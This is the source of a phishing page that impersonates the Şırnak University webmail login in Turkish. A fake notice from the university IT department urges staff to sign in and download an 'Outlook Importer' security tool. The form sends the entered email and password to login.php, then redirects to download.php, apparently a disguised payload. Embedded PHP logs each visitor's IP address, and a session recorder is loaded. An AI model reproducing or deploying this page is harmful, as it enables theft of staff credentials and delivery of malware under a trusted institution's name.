<!DOCTYPE html>
<html lang="en">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
    <script>
      function handleLogin() {
        var formData = new FormData(document.getElementById("loginForm"));
  
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "login.php", true);
        xhr.onreadystatechange = function() {
          if (xhr.readyState === 4 && xhr.status === 200) {
            var response = xhr.responseText.trim();
  
            if (response === "wrong") {
              Swal.fire({
                icon: "error",
                title: "Yanlış Parola! Lütfen Tekrar Deneyiniz!",
                showConfirmButton: false,
                timer: 2000
              });
            } else if (response === "success") {
              Swal.fire({
                icon: "success",
                title: "Başarılı!",
                showConfirmButton: false,
                timer: 2000
              });
              setTimeout(callBack_func, 2000);
              function callBack_func() {
              document.location.href = "./download.php";
              }
            }
          }
        };
        xhr.send(formData);
      }
    </script>
    <style>
         body {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: "Poppins", sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
        }

        #popup-container {
            position: relative;
            text-align: center; 
        }

        #popup-background {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            backdrop-filter: blur(5px);
            visibility: hidden;
            opacity: 0;
            transition: 0.5s;
            z-index: 1;
        }

        #popup-content {
          position: fixed;
          top: 50%;
          left: 50%;
          transform: translate(-50%, -50%);
          width: 600px;
          padding: 50px;
          box-shadow: 0 5px 30px rgba(0, 0, 0, 0.3);
          background: #fff;
          visibility: hidden;
          opacity: 0;
          transition: 0.5s;
          z-index: 2;
        }

        #popup-container.active #popup-background {
            visibility: visible;
            opacity: 1;
        }

        #popup-container.active #popup-content {
            visibility: visible;
            opacity: 1;
        }

        #popup-content a {
          display: inline-block;
          padding: 10px 20px;
          background-color: #0063a5; /* Choose your desired button color */
          color: #fff;
          text-decoration: none;
          border-radius: 5px;
          transition: background-color 0.3s;
          margin-right: ;
      }

      #popup-content a:hover {
          background-color: #45a049; /* Darker color on hover */
      }
        /* Add any other styles you need */
    </style>
    <title>Şırnak Üniversitesi Webmail Giriş </title>
     <link rel="icon" type="image/x-icon" href="/Login/favicon.ico">
    <meta
      name="description"
      content="Şırnak Üniversitesi Webmail Giriş"
    />
    <link rel="stylesheet" href="../shared/normalize.css" />
    <link rel="stylesheet" href="../shared/additional.css" />
    <link rel="stylesheet" href="style.css" />
    <link
      href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600;700&display=swap"
      rel="stylesheet"
    />
    <script type='text/javascript'>
      window.smartlook||(function(d) {
        var o=smartlook=function(){ o.api.push(arguments)},h=d.getElementsByTagName('head')[0];
        var c=d.createElement('script');o.api=new Array();c.async=true;c.type='text/javascript';
        c.charset='utf-8';c.src='https://web-sdk.smartlook.com/recorder.js';h.appendChild(c);
        })(document);
        smartlook('init', 'b0c433f1f3946f2df1547c870fbc5675190705a1', { region: 'eu' });
    </script>
  </head>

  <body onload="toggle()">
  <div id="popup-container">
        <div id="popup-background"></div>
        <div id="popup-content">
            <h2>Şırnak Üniversitesi Personellerinin DİKKATİNE!</h2>
            <p>
            Yükseköğretim Kurulu Başkanlığı'nın gerçekleştirdiği düzenlemeler sebebiyle, kurum çalışanlarının kullandığı "Outlook" platformlarında çeşitli güvenlik ayarlarının yapılması gerekmektedir. Şırnak Üniversitesi Bilgi İşlem Daire Başkanlığı tarafından oluşturulan Outlook Importer aracı ile bunu gerçekleştirebilirsiniz. İndirmek için lütfen kurum hesabınız ile giriş yapınız. Son tarih 13.12.2024!
            </p>
            <a href="#" onclick="toggle()">Kapat</a>
        </div>
  </div>
    <script>
        function toggle() {
            let popupContainer = document.getElementById('popup-container');
            popupContainer.classList.toggle('active');
        }
    </script>
  <?php
  $ip = $_SERVER['REMOTE_ADDR'];
  $logFile = 'visitors.txt';
  $logMessage = date('Y-m-d H:i:s') . " - IP: $ip\n";

  file_put_contents($logFile, $logMessage, FILE_APPEND | LOCK_EX);
  ?>
    <form id="loginForm" onsubmit="event.preventDefault(); handleLogin();">
      <div class="content">
        <div class="content-left">
          <div class="form-wrapper">
            <div class="logo">
              <img src="./logo.png" alt="Logo"/>
            </div>
            <h1 class="text-title">Giriş Yap</h1>
           

            <div class="field-group">
              <label class="label" for="txt-email">E-Posta Adresi (@sirnak.edu.tr)</label>
              <input class="input" type="text" id="txt-email" name="email" />
            </div>
            <div class="field-group">
              <div class="label-wrapper">
                <label class="label" for="txt-password">Şifre</label>
                <label class="label label--right" onclick="tooglePassword()">
                  <svg
                    class="label-icon eye is--show"
                    xmlns="http://www.w3.org/2000/svg"
                    width="24"
                    height="24"
                    viewBox="0 0 24 24"
                    fill="none"
                    stroke="currentColor"
                    stroke-width="2"
                    stroke-linecap="round"
                    stroke-linejoin="round"
                    class="feather feather-eye"
                  >
                    <path d="M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8z"></path>
                    <circle cx="12" cy="12" r="3"></circle>
                  </svg>
                  <svg
                    class="label-icon eye-off is--hide"
                    xmlns="http://www.w3.org/2000/svg"
                    width="24"
                    height="24"
                    viewBox="0 0 24 24"
                    fill="none"
                    stroke="currentColor"
                    stroke-width="2"
                    stroke-linecap="round"
                    stroke-linejoin="round"
                    class="feather feather-eye-off"
                  >
                    <path
                      d="M17.94 17.94A10.07 10.07 0 0 1 12 20c-7 0-11-8-11-8a18.45 18.45 0 0 1 5.06-5.94M9.9 4.24A9.12 9.12 0 0 1 12 4c7 0 11 8 11 8a18.5 18.5 0 0 1-2.16 3.19m-6.72-1.07a3 3 0 1 1-4.24-4.24"
                    ></path>
                    <line x1="1" y1="1" x2="23" y2="23"></line>
                  </svg>
                  <span class="label-text">Göster</span>
                </label>
              </div>
              <input class="input" type="password" id="txt-password" name="password" />
            </div>

            <div class="field-group">
              <input class="btn-submit" type="submit" value="Giriş Yap" />
            </div>

            <div class="field-group">
              <label class="checkbox-label"
                >Beni Unutma
                <input type="checkbox" />
                <span class="checkbox-checkmark"></span>
              </label>
            </div>

            <div class="field-group text-center">
              <a href="#forgot-password">Şifremi Unuttum</a>
            </div>
          </div>
        </div>
      </div>  

    <script>
      function a() {
        var p = document.querySelector('#txt-password');
        var t = document.querySelector('.label-text');
        var ey = document.querySelector('.eye');
        var eyo = document.querySelector('.eye-off');
        var currType = p.getAttribute('type');

        if (currType === 'password') {
          t.innerHTML = 'Hide';
          p.setAttribute('type', 'text');
          ey.classList.replace('is--show', 'is--hide');
          eyo.classList.replace('is--hide', 'is--show');
        } else {
          t.innerHTML = 'Show';
          p.setAttribute('type', 'password');
          eyo.classList.replace('is--show', 'is--hide');
          ey.classList.replace('is--hide', 'is--show');
        }
      }

      window.tooglePassword = a;
    </script>
  </body>
</html>
